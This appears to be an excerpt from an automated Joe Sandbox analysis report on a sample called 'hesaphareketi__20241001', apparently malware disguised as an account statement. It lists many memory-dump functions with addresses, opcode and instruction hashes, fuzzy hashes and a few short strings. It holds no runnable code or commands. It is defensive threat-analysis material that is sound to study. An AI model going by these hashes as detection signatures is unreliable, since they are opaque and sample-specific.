                                        • Opcode ID: 7ff3922232b6df758688c92fefa9a4cc0c033b90cdea0f983487704410eb7f39
                                        • Instruction ID: 0f6e52a50cf69bc49b2cd254272824b9f1a2e4811c77580b62d650a4eb215c3b
                                        • Opcode Fuzzy Hash: 7ff3922232b6df758688c92fefa9a4cc0c033b90cdea0f983487704410eb7f39
                                        • Instruction Fuzzy Hash: 5BF082B2A00105AFDF04CF94E985A9E7BA6EF58210F15C06BE404E7360E6319940C754
                                        Function 0757D2F0 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4f5b7f537d9dc48eeefec6a22cced3ec5672067ddfc5b63a768754cc23641f45
                                        • Instruction ID: be41b7d94ad473fb0958a847b99831ca5d98288d7cb1e2daf6a7f76f5070a11f
                                        • Opcode Fuzzy Hash: 4f5b7f537d9dc48eeefec6a22cced3ec5672067ddfc5b63a768754cc23641f45
                                        • Instruction Fuzzy Hash: 89F090B4D043489FCB52DFB8D8005DEBFB1BF05314F1486AAD85097392D7365641DB91
                                        Function 0757B5F0 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b559167a6db496ae2849e435c45756eae3757c7b980ef3c3609f9864fe654f7a
                                        • Instruction ID: 73e502b35fa9082cb807eff1fa24e935e148c834a4a26b84aa2e10616de44ef5
                                        • Opcode Fuzzy Hash: b559167a6db496ae2849e435c45756eae3757c7b980ef3c3609f9864fe654f7a
                                        • Instruction Fuzzy Hash: 6FF0E2B0C142889FCB41DFB8D0445C8BFB0AF01224F00C1EAE8548B3A2E6319904CF80
                                        Function 07570530 Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c10e5d1b800e906110cc486cc74054bd061c831e9eb769dedbbf4bf7b7c05056
                                        • Instruction ID: 0009b38171a571d9ce5507ef79d1b92c542d67954b1d743bb4d5691121c8734e
                                        • Opcode Fuzzy Hash: c10e5d1b800e906110cc486cc74054bd061c831e9eb769dedbbf4bf7b7c05056
                                        • Instruction Fuzzy Hash: 4BE092B12143405FCF199A48E8825967FE9FB09354B1409AAE005CF341EBA9EC028B84
                                        Function 0757DD20 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e61820ab01cd41ccc8f79631f2488a9eb37eb851565c28ac69f75e8b7aa4e75
                                        • Instruction ID: 9ae0999033e73a0d261471cc816e2a3f6d8bf9ee57a29adb707933720e87e182
                                        • Opcode Fuzzy Hash: 4e61820ab01cd41ccc8f79631f2488a9eb37eb851565c28ac69f75e8b7aa4e75
                                        • Instruction Fuzzy Hash: D1E092B0915358DFC741EFB8D4452DC7FF4AB05201F1040E6DC44E3352EA350A40DB91
                                        Function 0757663C Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 69c5acc74a50f46947727c25a69c48368c5e4e3794507e59622adf5028a3172e
                                        • Instruction ID: 2b3af5a45ef9e975e3767269fdf2511c6d7a99a29ba15b20d17c13e6cef16ebc
                                        • Opcode Fuzzy Hash: 69c5acc74a50f46947727c25a69c48368c5e4e3794507e59622adf5028a3172e
                                        • Instruction Fuzzy Hash: 51F0CFB4C21269CFCB64CF65D9846DDBBB0FBA9300F1085D9D48A76254CBB44AC1CF44
                                        Function 0757D5C6 Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fb35e08161def4db46aa45fccf14173792778717b368c457577431ed80287e43
                                        • Instruction ID: 020cd8a41ef8d1f0c57715276759da64d0b63896a16b529644a2b1f08b28ad6c
                                        • Opcode Fuzzy Hash: fb35e08161def4db46aa45fccf14173792778717b368c457577431ed80287e43
                                        • Instruction Fuzzy Hash: B5E08CB9B4A304CBCB249E00FD407E8773CFF86219F1069A1C00DD7115D7302A40CE01
                                        Function 0757D300 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ef03a1af7b4a89acab28bc3eaf89deec7f9f7a9d74a02b52326fc9ca3ecbe0f
                                        • Instruction ID: e610641be0ecde0cab50fcae4015de2c91c3add5af65522c98e94c4818a82d48
                                        • Opcode Fuzzy Hash: 2ef03a1af7b4a89acab28bc3eaf89deec7f9f7a9d74a02b52326fc9ca3ecbe0f
                                        • Instruction Fuzzy Hash: EFE0C9B4D01209DFCB45EFA8D801AADBBB5BB04300F5085AAD814A3340D7719651DF91
                                        Function 0757EF15 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 09696551e98283b4145c2508d2e934a93f5418a07c51cd3af4702bf24a74ed90
                                        • Instruction ID: 98d0b92697eed464642b4afce655fd886aa486ba84b7ca7a42b4921ece600731
                                        • Opcode Fuzzy Hash: 09696551e98283b4145c2508d2e934a93f5418a07c51cd3af4702bf24a74ed90
                                        • Instruction Fuzzy Hash: 96E0EDB0528214CFC724CB14E559DB877B9BB0B211F40A996E81EA72A1CB319942DF20
                                        Function 0757B600 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d7d26a04cdd38998ca5ae176b6a24e3972226d834c2a322fdbf1d40f3c34ab3
                                        • Instruction ID: 7c32b0768721788b92afe44ac83449571716a0279d1dcae6ac62ad80ed00b9bd
                                        • Opcode Fuzzy Hash: 2d7d26a04cdd38998ca5ae176b6a24e3972226d834c2a322fdbf1d40f3c34ab3
                                        • Instruction Fuzzy Hash: 7DE09AB4D21208DFCB80DFA9D445A9CBBF4EB08611F00C1EAD918D7361E6359950CF41
                                        Function 07579388 Relevance: .0, Instructions: 18COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2171a4fb57f77114f1f37c58e56159abdebb783543f4927944a217af78ca1c50
                                        • Instruction ID: daa8068ed57e3092ebd434b279b1b9f3f1e37dc644964234d55e1fdf67ac4a7c
                                        • Opcode Fuzzy Hash: 2171a4fb57f77114f1f37c58e56159abdebb783543f4927944a217af78ca1c50
                                        • Instruction Fuzzy Hash: B6D02BF254D2868BC712C2B4D4463993F904B02362F1513C989944B6E3D6610D01CB56
                                        Function 0757B468 Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a632b207eb8852bb16984d688a5691a89ea05afd444d870f16190ceea3533f4
                                        • Instruction ID: 054d129eab090f3f6e7416eb550f762840989bf83233540a79ca91a35a609cae
                                        • Opcode Fuzzy Hash: 0a632b207eb8852bb16984d688a5691a89ea05afd444d870f16190ceea3533f4
                                        • Instruction Fuzzy Hash: 90E0E2B0D11208AFCB40EFE9D44569CBBF4AB04200F0081AAA818A3240EA345A54CF81
                                        Function 0757DD30 Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aa0e65a3e188c6cb8f85cce02ffe81c7b5ab96fac02d118dc4bf5412c1ae7829
                                        • Instruction ID: 0415c7bdd0aea6b8a67cd66a5b31fc385454a8cfc174478b83d3a7bb490a903c
                                        • Opcode Fuzzy Hash: aa0e65a3e188c6cb8f85cce02ffe81c7b5ab96fac02d118dc4bf5412c1ae7829
                                        • Instruction Fuzzy Hash: 93E012B0D11208DFC784DFB8D54669CBFF4AB04201F1040A9EC04A3351EA305A50DB81
                                        Function 0757ECB6 Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c74a2f5150175c8c68edf1f127a709995ba0a593a87b8db976108249a1e9884
                                        • Instruction ID: e18752e812142ab46ce20af7ce0bf610bf06dbfb25fc0edf465cf682884c40a1
                                        • Opcode Fuzzy Hash: 2c74a2f5150175c8c68edf1f127a709995ba0a593a87b8db976108249a1e9884
                                        • Instruction Fuzzy Hash: EBE0EC74928255DFCB15CF12E8055FDBB7ABB9A311F009492E40A92192DB304A46DA90
                                        Function 075738D2 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8cde12e19288476e1ed25d87798a7a3752911390ce53f509b02c0a4c573297f7
                                        • Instruction ID: 71f272b76a8317a85723f82f5a9c8a5e92f7efe69acbf83d959f1cc1224eacd4
                                        • Opcode Fuzzy Hash: 8cde12e19288476e1ed25d87798a7a3752911390ce53f509b02c0a4c573297f7
                                        • Instruction Fuzzy Hash: BDD0A7F1419304DFD311DAF49C0A75ABFE8D71A356F00A06AF448D3181ED758400EB52
                                        Function 0757D7EA Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e255fa9f4c4cc6504fe6d692e7739ae834224c2e97cb26f6d13b2713d34c002
                                        • Instruction ID: 8a3e1865e5f58dceab11a273e49b931059a5ac58c63e56e7b62e981c398235b9
                                        • Opcode Fuzzy Hash: 4e255fa9f4c4cc6504fe6d692e7739ae834224c2e97cb26f6d13b2713d34c002
                                        • Instruction Fuzzy Hash: 54D01735A452088FDB20AF04ED507D87B79FB85215F1056A1D148A3214C7742A448F41
                                        Function 07579398 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4aba8a09fd317b81b86e6d770be5b1ee3702a2f5ac9903c1d7242464d40f7871
                                        • Instruction ID: ddb94bf5c932e6b32d825d5bbdf84fd41dfcceff9c5e696f81f411fcb5b9987e
                                        • Opcode Fuzzy Hash: 4aba8a09fd317b81b86e6d770be5b1ee3702a2f5ac9903c1d7242464d40f7871
                                        • Instruction Fuzzy Hash: 07D0A77081510CDFC700EBB8D40A69DBBF49700201F1041A9880853291EA305E10DB95
                                        Function 075760F5 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d3d821d773c3e50f5f5f68006ccfe640ffd0bb06e729292e27109c1529ec0a00
                                        • Instruction ID: 58118879a5feb0b85d92019c0e2d19386c770d613ffb6107763daa4e9ddefe9c
                                        • Opcode Fuzzy Hash: d3d821d773c3e50f5f5f68006ccfe640ffd0bb06e729292e27109c1529ec0a00
                                        • Instruction Fuzzy Hash: F4E07EB4621314CFC7658F60D2998987BB2FF49312F505498E81AAB360CF35E981CE00
                                        Function 075738E0 Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 019fad8033dbf64ed59768e5c701386b31fb0257b0c94eefe20f798e116a0b2c
                                        • Instruction ID: 4c86a2b86c73a123d728691dbb8b20c0354e420a9054d861c20b46d942ca709b
                                        • Opcode Fuzzy Hash: 019fad8033dbf64ed59768e5c701386b31fb0257b0c94eefe20f798e116a0b2c
                                        • Instruction Fuzzy Hash: 36C012B0416308DFD311EAF5A80A7557FECE705222F009155F408C3141DE714450EAA1
                                        Function 0757F4FF Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e82eaf5e8fc20233b4c02210bfb8fc879dca1918fcec5be42cdc611fd3ccbbc3
                                        • Instruction ID: 88f883b83892bcd2961f64f6344260143b2ab4c26920cc36ac60eee37b770a69
                                        • Opcode Fuzzy Hash: e82eaf5e8fc20233b4c02210bfb8fc879dca1918fcec5be42cdc611fd3ccbbc3
                                        • Instruction Fuzzy Hash: 12D09E70124114CFC714CB14E555DA877B9BB0B301F80A4D6F40A97352CF319941DE10
                                        Function 07573D95 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63c477aef4a41c0da8b67a557f61bbe73d11380b108ca949280f4e3104812fb8
                                        • Instruction ID: 7e7e5e1ae6388adab26d2dc23e8e7cd32c030d5b6cefd98aa22befc69aa20f04
                                        • Opcode Fuzzy Hash: 63c477aef4a41c0da8b67a557f61bbe73d11380b108ca949280f4e3104812fb8
                                        • Instruction Fuzzy Hash: A4D012309111168FC795DF65EE84A8CB7B5FF88240F109668D409A3128EB385989CF04
                                        Function 0757D350 Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b5990e6dbe117382772f3933bad9d862ffe094277e0556f7ef38a02fe41822c1
                                        • Instruction ID: a4b6e933f8ebb6adc89aeac532e835d3c529406185e29a8a88eeb0d9d6e6fd8f
                                        • Opcode Fuzzy Hash: b5990e6dbe117382772f3933bad9d862ffe094277e0556f7ef38a02fe41822c1
                                        • Instruction Fuzzy Hash: C9C08CB0010308CBC228AB98B80E3783AA87B00216F406051FD0C414118FB5C050D7E1
                                        Function 0757D34F Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c463d9fa86502403cd4128ff87871715058ab52a9f235e3c16eb807aec1080bc
                                        • Instruction ID: 08052616d6b95d95c46542494f56337f0fe9053f560a308cc15b1bd27c65f777
                                        • Opcode Fuzzy Hash: c463d9fa86502403cd4128ff87871715058ab52a9f235e3c16eb807aec1080bc
                                        • Instruction Fuzzy Hash: 3CC08CE10A8644CBCF998A88EA8922C6AB0AD051217286986FD6CD5251D614C2045382
                                        Function 07571908 Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9b1d63d022bd046e7494fb6beb5cdce133a7549071c441c7b3bb9ed6e33638c0
                                        • Instruction ID: d323aad90c46cc61f78c47db208429c4a8ecb98f994c6da980ac2a3a16bdcde0
                                        • Opcode Fuzzy Hash: 9b1d63d022bd046e7494fb6beb5cdce133a7549071c441c7b3bb9ed6e33638c0
                                        • Instruction Fuzzy Hash: 0DC0807341054489EB515760C80FF8FBFF1BB51344F054094D8C526072D56DC115D712
                                        Function 07570404 Relevance: .0, Instructions: 9COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b9c79e397399a7712e442ac73c6b4e5809b165f6fe207e201927fc21685be6c
                                        • Instruction ID: 91632edc4a0abeaa7a95e6c68a4048bb6a925ea33941bbc6822239fdd0d3463c
                                        • Opcode Fuzzy Hash: 0b9c79e397399a7712e442ac73c6b4e5809b165f6fe207e201927fc21685be6c
                                        • Instruction Fuzzy Hash: 60C04C75464509DA8605A7549585C55FAE6FFD5700B818C61A148460319A21C519E716
                                        Function 07574688 Relevance: .0, Instructions: 8COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d14e40b8ef2c9757a57eaafdd22240e86da728d77d868193037d5dfb2f882da
                                        • Instruction ID: 5fef2a3ec490ceb20038302e476b14f5966abb68db05ec3c4132552a01b99dd3
                                        • Opcode Fuzzy Hash: 8d14e40b8ef2c9757a57eaafdd22240e86da728d77d868193037d5dfb2f882da
                                        • Instruction Fuzzy Hash: ABB012FD9B5281E544043268598DD6E9555FFEAB00F81CC15730860010C8B19439D12B
                                        Function 0757A440 Relevance: .0, Instructions: 8COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 59b9ecf68f6163c92c7f3015559bb3e82742ba79ca036de52fd88b2917a2e501
                                        • Instruction ID: e759580cbfb978234f0f75f6cafd2d116fb8c610ab6ef05d84f888395b543e1f
                                        • Opcode Fuzzy Hash: 59b9ecf68f6163c92c7f3015559bb3e82742ba79ca036de52fd88b2917a2e501
                                        • Instruction Fuzzy Hash: C1C02BB98082C0DACE005B208D83F8B3AA0BFF4701F4784E9A2080C853CC744030D723

                                        Non-executed Functions

                                        Function 075793D8 Relevance: 3.9, Strings: 3, Instructions: 143COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: '<"C$'<"C$NvTt
                                        • API String ID: 0-1787953242
                                        • Opcode ID: 7ff3ef09f3ba879bd6efc34e1cbd9fcbb24e2c3767d5a1fbf67152cf0280e025
                                        • Instruction ID: 13288dc27b8ce6ea61d730c15d4d66c9fe9ac4b30231e9b66dd5a3aa3afc7557
                                        • Opcode Fuzzy Hash: 7ff3ef09f3ba879bd6efc34e1cbd9fcbb24e2c3767d5a1fbf67152cf0280e025
                                        • Instruction Fuzzy Hash: 215103B4E14219DFCB04CFAAE5855EEFBF2BF89210F10A42AE415A7354EB345A41CF64
                                        Function 075793C8 Relevance: 3.9, Strings: 3, Instructions: 142COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: '<"C$'<"C$NvTt
                                        • API String ID: 0-1787953242
                                        • Opcode ID: 37aece182be25938b8071a258c1e325bcb8b5fbc7e2adec74d221b7ede653333
                                        • Instruction ID: 0a63fb54db15d51699b8ad779950b33f625e66a341571958309cabc2e905feca
                                        • Opcode Fuzzy Hash: 37aece182be25938b8071a258c1e325bcb8b5fbc7e2adec74d221b7ede653333
                                        • Instruction Fuzzy Hash: D351F0B4E14219DFCB08CFAAE5855EEFBF2BF88300F10A42AE415A7254EB345A41CF54
                                        Function 07A386B0 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH]q$PH]q
                                        • API String ID: 0-1166926398
                                        • Opcode ID: 18f75ce366bf2803bcaa177ef9aec30e6a4baf04e327f12744c321af74cb5828
                                        • Instruction ID: e404d4744114501d2374cc5b9cc4af76f3b0fb730045f0304bc06a6baec2127a
                                        • Opcode Fuzzy Hash: 18f75ce366bf2803bcaa177ef9aec30e6a4baf04e327f12744c321af74cb5828
                                        • Instruction Fuzzy Hash: 22D1C3B4A00205CFDB18CF69C598AA9B7F2BF8D701F2580A8F515AB361DB35AD44CF60
                                        Function 07578D10 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: sX
                                        • API String ID: 0-3110708420
                                        • Opcode ID: 1be77ecc8d0a2ca6c03672450bb7d488326931a90906144ed32c89d2e8a5e6d6
                                        • Instruction ID: 4bb6b0606594646c94b82425686f0ad153aee4bdfe8ba6c1eeefb892e77dafe5
                                        • Opcode Fuzzy Hash: 1be77ecc8d0a2ca6c03672450bb7d488326931a90906144ed32c89d2e8a5e6d6
                                        • Instruction Fuzzy Hash: 9261F1B4E15209CFCB44CFAAD9849DEFBF2FB89210F24942AD415B7314D734AA42CB64
                                        Function 07578D03 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: sX
                                        • API String ID: 0-3110708420
                                        • Opcode ID: 9e76537167a0a869ab0ac55f87cf3cc576fa771c26416445d57ae6bc4554ae5b
                                        • Instruction ID: d74f0848fa4ddc4121183375ca47fd3f221ed25880b2f2f5636602ae0a712c1d
                                        • Opcode Fuzzy Hash: 9e76537167a0a869ab0ac55f87cf3cc576fa771c26416445d57ae6bc4554ae5b
                                        • Instruction Fuzzy Hash: 3361E2B4E15209CFCB44CFAAD5849DEBBF2FF89210F24982AD415B7354D734AA42CB64
                                        Function 07575078 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: V3~
                                        • API String ID: 0-1917302123
                                        • Opcode ID: f4acfaca137880ab7b782789bf3c939d179669ddbcb31b33bc83657195bef577
                                        • Instruction ID: c2d2288764e9aec9fdcc9d90ab9dc54f9952fa0c649fbf1de67208bdc69f91e1
                                        • Opcode Fuzzy Hash: f4acfaca137880ab7b782789bf3c939d179669ddbcb31b33bc83657195bef577
                                        • Instruction Fuzzy Hash: 1C5129B0E152198FDB08CFA9D9406EEFBF2FB88301F14D52AD419B7254E7349A51CBA4
